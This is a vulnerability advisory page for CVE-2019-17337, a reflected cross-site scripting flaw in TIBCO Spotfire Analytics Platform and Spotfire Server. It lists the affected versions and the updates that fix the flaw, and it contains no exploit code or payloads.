CVE-2019-17337 : Vulnerability Insights and Analysis
Discover the vulnerability in TIBCO Spotfire Analytics Platform and Spotfire Server allowing a reflected cross-site scripting attack. Learn about affected versions and mitigation steps.
The TIBCO Spotfire Analytics Platform for AWS Marketplace and TIBCO Spotfire Server have identified a vulnerability that could lead to a reflected cross-site scripting (XSS) attack.
Understanding CVE-2019-17337
What is CVE-2019-17337?
The vulnerability in the Spotfire library component of TIBCO Spotfire Analytics Platform and Spotfire Server could allow an attacker to execute a reflected XSS attack.
The Impact of CVE-2019-17337
The vulnerability could potentially grant an attacker full administrative access to the web interface of the affected component.
Technical Details of CVE-2019-17337
Vulnerability Description
The vulnerability lies in the Spotfire library component, enabling a reflected cross-site scripting (XSS) attack.
Affected Systems and Versions
- TIBCO Spotfire Analytics Platform for AWS Marketplace version 10.6.0
- TIBCO Spotfire Server versions 7.11.7 and below, 7.12.0, 7.13.0, 7.14.0, 10.0.0 to 10.6.0
Exploitation Mechanism
The vulnerability allows attackers to inject malicious scripts into web pages viewed by other users.
Mitigation and Prevention
Immediate Steps to Take
- Update TIBCO Spotfire Analytics Platform to version 10.6.1 or higher
- Update TIBCO Spotfire Server versions 7.11.7 and below to version 7.11.8 or higher
- Update TIBCO Spotfire Server versions 7.12.0 to 10.3.4 to version 10.3.5 or higher
- Update TIBCO Spotfire Server versions 10.4.0 to 10.6.0 to version 10.6.1 or higher
Long-Term Security Practices
- Regularly monitor and apply security patches
- Conduct security assessments and penetration testing
Patching and Updates
TIBCO has released updated versions to address the vulnerability in both the Spotfire Analytics Platform and Spotfire Server.